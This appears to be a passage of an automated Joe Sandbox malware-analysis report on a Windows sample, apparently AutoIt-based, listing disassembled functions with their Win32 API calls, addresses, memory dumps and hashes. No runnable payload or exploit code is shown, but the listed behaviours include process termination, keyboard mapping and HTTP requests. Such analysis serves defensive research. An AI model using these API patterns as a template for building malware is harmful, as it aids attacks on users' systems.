                                                                          • Opcode ID: 414b1b079e57caa2746fcfd0f37df466d3f068ade6c2bc2a64a447bd889d8488
                                                                          • Instruction ID: 47cd21be0d5c4429638ae6a59c704f397a2b1252aa9cb67feb655dd20b31285b
                                                                          • Opcode Fuzzy Hash: 414b1b079e57caa2746fcfd0f37df466d3f068ade6c2bc2a64a447bd889d8488
                                                                          • Instruction Fuzzy Hash: E9115972500209AFDF028FA4DD49BEE7BADEF09348F058165FE05E2160C7728D64EB60
                                                                          Function 0036B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0036B7B5
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0036B7C6
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0036B7CD
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0036B7D5
                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036B7EC
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0036B7FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: 2591349432d989c3bcee2f064709927ca7952321fb368fa1f2a47fc5038c89db
                                                                          • Instruction ID: 1187aa1ba7ff985934f76efa1b436428147d968f2797ca6f9e67e34fd3d44e22
                                                                          • Opcode Fuzzy Hash: 2591349432d989c3bcee2f064709927ca7952321fb368fa1f2a47fc5038c89db
                                                                          • Instruction Fuzzy Hash: 68017175A00309BFEB119BA69C45A5ABFACEF48311F008066FA04E7291D6719C10CFA0
                                                                          Function 00330162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00330193
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0033019B
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003301A6
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003301B1
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 003301B9
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003301C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: 5a2ac757328d691b107112fff851293e42734b45879e204521816a8432f143fe
                                                                          • Instruction ID: 2f19bb5bc7dd4dcfa8ae7d8213bf9f38d70487341b03391ff9a970292042abfa
                                                                          • Opcode Fuzzy Hash: 5a2ac757328d691b107112fff851293e42734b45879e204521816a8432f143fe
                                                                          • Instruction Fuzzy Hash: 28016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5
                                                                          Function 003753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003753F9
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0037540F
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0037541E
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0037542D
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00375437
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0037543E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: c42452143445cf67b1bec683f7f0ff85b1bce89ad13ba57f6e1fa5ad040c1c12
                                                                          • Instruction ID: 68f703dc3839a2766e29897fed240111ac2618f7ca0b3e1acb206ed6b670b55d
                                                                          • Opcode Fuzzy Hash: c42452143445cf67b1bec683f7f0ff85b1bce89ad13ba57f6e1fa5ad040c1c12
                                                                          • Instruction Fuzzy Hash: 16F03032641658BFE7225BA2DC0EEEF7B7CEFC6B11F00016AFA04D1051D7A61A01C6B5
                                                                          Function 00377230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00377243
                                                                          • EnterCriticalSection.KERNEL32(?,?,00320EE4,?,?), ref: 00377254
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00320EE4,?,?), ref: 00377261
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00320EE4,?,?), ref: 0037726E
                                                                            • Part of subcall function 00376C35: CloseHandle.KERNEL32(00000000,?,0037727B,?,00320EE4,?,?), ref: 00376C3F
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00377281
                                                                          • LeaveCriticalSection.KERNEL32(?,?,00320EE4,?,?), ref: 00377288
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: ed9ba2ed32c13ae2195af446832a1ded1cec43acc858b625bb8d25a859c8ade5
                                                                          • Instruction ID: f43d5f69e1bdc865474724164be97dc28dd70487657adfcecbf1a3fc0fd62501
                                                                          • Opcode Fuzzy Hash: ed9ba2ed32c13ae2195af446832a1ded1cec43acc858b625bb8d25a859c8ade5
                                                                          • Instruction Fuzzy Hash: B9F03A3A540612AFD7232B68ED8CADA773DEF49702F110933F642D50A1CB7B6811CA50
                                                                          Function 00368992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0036899D
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 003689A9
                                                                          • CloseHandle.KERNEL32(?), ref: 003689B2
                                                                          • CloseHandle.KERNEL32(?), ref: 003689BA
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003689C3
                                                                          • HeapFree.KERNEL32(00000000), ref: 003689CA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: 77917635242664e9a6d9330ed8854d9e5e00bd3ccaa64f27649a822f79171d88
                                                                          • Instruction ID: 10358fb73cfb8d6df6fa0015251bc776d1e68368b3b3cde2944b3824e769516d
                                                                          • Opcode Fuzzy Hash: 77917635242664e9a6d9330ed8854d9e5e00bd3ccaa64f27649a822f79171d88
                                                                          • Instruction Fuzzy Hash: BEE04E76104505EFDB022BE5EC0895ABB69EB89762B608622F219C1470CB3794619B90
                                                                          Function 00367530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 003676EA
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 00367702
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0039FB80,000000FF,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 00367727
                                                                          • _memcmp.LIBCMT ref: 00367748
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID: ,,:
                                                                          • API String ID: 314563124-824956042
                                                                          • Opcode ID: 613bed70420322c3902813980e1300d665961e9ac2c19cf9a6a17121350f7428
                                                                          • Instruction ID: 1d2f0f2d50768584b24c72d1eaba1e6edd0b8e541ff37b938e0e5cce222ee978
                                                                          • Opcode Fuzzy Hash: 613bed70420322c3902813980e1300d665961e9ac2c19cf9a6a17121350f7428
                                                                          • Instruction Fuzzy Hash: 30812D75A00109EFCB05DFA4C984DEEB7B9FF89315F208158E506EB254DB71AE46CB60
                                                                          Function 003885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00388613
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00388722
                                                                          • VariantClear.OLEAUT32(?), ref: 0038889A
                                                                            • Part of subcall function 00377562: VariantInit.OLEAUT32(00000000), ref: 003775A2
                                                                            • Part of subcall function 00377562: VariantCopy.OLEAUT32(00000000,?), ref: 003775AB
                                                                            • Part of subcall function 00377562: VariantClear.OLEAUT32(00000000), ref: 003775B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: fb1ccd5d9a40607b5fb0afc8a2efe207193e1a809296b10ec6cb82cdd8b3b5a3
                                                                          • Instruction ID: 7c5995e625a02790e476f2cf9bcbd0ae8724f3eb9c14cc804048f13ae47d8431
                                                                          • Opcode Fuzzy Hash: fb1ccd5d9a40607b5fb0afc8a2efe207193e1a809296b10ec6cb82cdd8b3b5a3
                                                                          • Instruction Fuzzy Hash: F8918C716043019FC715EF24C48499AB7F8EF89714F54896EF88A8B361DB31E945CB92
                                                                          Function 00372A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0032FC86: _wcscpy.LIBCMT ref: 0032FCA9
                                                                          • _memset.LIBCMT ref: 00372B87
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372BB6
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00372C69
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00372C97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: fb47a4c4fcbc9c68366da13fde76891a340fec46a7dd7b82e43dc3e74bd3d9d8
                                                                          • Instruction ID: 8003773aa80ac5806120a36dac3107c2895e4e84afbf2e77b977474236abb4e8
                                                                          • Opcode Fuzzy Hash: fb47a4c4fcbc9c68366da13fde76891a340fec46a7dd7b82e43dc3e74bd3d9d8
                                                                          • Instruction Fuzzy Hash: CA51DF712083029FD7379F28D885A6FB7E8EF69310F058A2DF899D6291DB78CD448752
                                                                          Function 00323137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_free
                                                                          • String ID: 3c2$_2
                                                                          • API String ID: 2620147621-3690450720
                                                                          • Opcode ID: 2203dbefd874008afd1fa9fdb34d333f1a0517031d6527a3a6586fe1704721cb
                                                                          • Instruction ID: 3400e2275f175802fa6fda7768afc94b71fcf0797639009297d2b567302d37c6
                                                                          • Opcode Fuzzy Hash: 2203dbefd874008afd1fa9fdb34d333f1a0517031d6527a3a6586fe1704721cb
                                                                          • Instruction Fuzzy Hash: 5E51AB71A083118FCB26DF29D491B6ABBE5BF85300F45486DE98987360DB35E901CB82
                                                                          Function 00326192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: 3c2$ERCP
                                                                          • API String ID: 2532777613-3657493774
                                                                          • Opcode ID: b99310f0b645e88c36cd32dc14029328ffcc9222b290ab375dc0a10d1faabc1d
                                                                          • Instruction ID: ea166b3723d80d626ce6f9eff3e48d12a65d4c8d304338fb5946153ad6b2a5f8
                                                                          • Opcode Fuzzy Hash: b99310f0b645e88c36cd32dc14029328ffcc9222b290ab375dc0a10d1faabc1d
                                                                          • Instruction Fuzzy Hash: 5C51C371900715DBDB26CF65D886BABB7F8EF04304F21896EE54ADB290E770EA40CB40
                                                                          Function 00372753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003727C0
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003727DC
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00372822
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003D5890,00000000), ref: 0037286B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: 3ecc3c66b1d24963e4c5a4aa93cc04961ac4669ad08cec7b6f0188a0284c5856
                                                                          • Instruction ID: 726ca585bbd875910987b7f47e26174055700990d79ad6ff6d25e66eef3ece28
                                                                          • Opcode Fuzzy Hash: 3ecc3c66b1d24963e4c5a4aa93cc04961ac4669ad08cec7b6f0188a0284c5856
                                                                          • Instruction Fuzzy Hash: FF41C070204341AFD736DF25C844B1BBBE8EF85310F05892EF8A99B292D735A804CB53
                                                                          Function 0038D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038D7C5
                                                                            • Part of subcall function 0031784B: _memmove.LIBCMT ref: 00317899
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower_memmove
                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                          • API String ID: 3425801089-567219261
                                                                          • Opcode ID: 100108d03a803da896a417d4ec79e79d10daa5e53806fd3ea6e19c9846bfdba4
                                                                          • Instruction ID: aad63f04a93425d986b978fc351b594cbde3dffe2e46bba57aaaf9f226993a89
                                                                          • Opcode Fuzzy Hash: 100108d03a803da896a417d4ec79e79d10daa5e53806fd3ea6e19c9846bfdba4
                                                                          • Instruction Fuzzy Hash: D131AF71904719ABCF06EF54C895AEEB3B8FF04320F10866AE8259B6D1DB31AD05CB80
                                                                          Function 00368E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00368F14
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00368F27
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00368F57
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: 6843746d87a10d48aba63f2c74c970859e8576a285d20d9a8aee31c77b12c062
                                                                          • Instruction ID: c55f09deb38198040899b66f867cd1edb124f37806164c9ee2e10bb5ff19c24e
                                                                          • Opcode Fuzzy Hash: 6843746d87a10d48aba63f2c74c970859e8576a285d20d9a8aee31c77b12c062
                                                                          • Instruction Fuzzy Hash: B321E471A04104BEDB1AABB0EC86DFFB77DDF49320F14861AF821AB1E1DF3548599A10
                                                                          Function 0038182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038184C
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381872
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003818A2
                                                                          • InternetCloseHandle.WININET(00000000), ref: 003818E9
                                                                            • Part of subcall function 00382483: GetLastError.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 00382498
                                                                            • Part of subcall function 00382483: SetEvent.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 003824AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3113390036-3916222277
                                                                          • Opcode ID: 4d38c58d79d0b46fa2a4554b566d0a97bd7aa1b8fa05fab81b13be44cc6999ad
                                                                          • Instruction ID: 969c6583ef11b2ebe1cbaa6b522809b152a8aef35315c6056fad1cc9ae501118
                                                                          • Opcode Fuzzy Hash: 4d38c58d79d0b46fa2a4554b566d0a97bd7aa1b8fa05fab81b13be44cc6999ad
                                                                          • Instruction Fuzzy Hash: 692180B1500308BFEB12AB65DC86EBB77EDEB48744F10416AF805D7140DB719D0657B1
                                                                          Function 003963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00396461
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00396468
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0039647D
                                                                          • DestroyWindow.USER32(?), ref: 00396485
                                                                          Strings
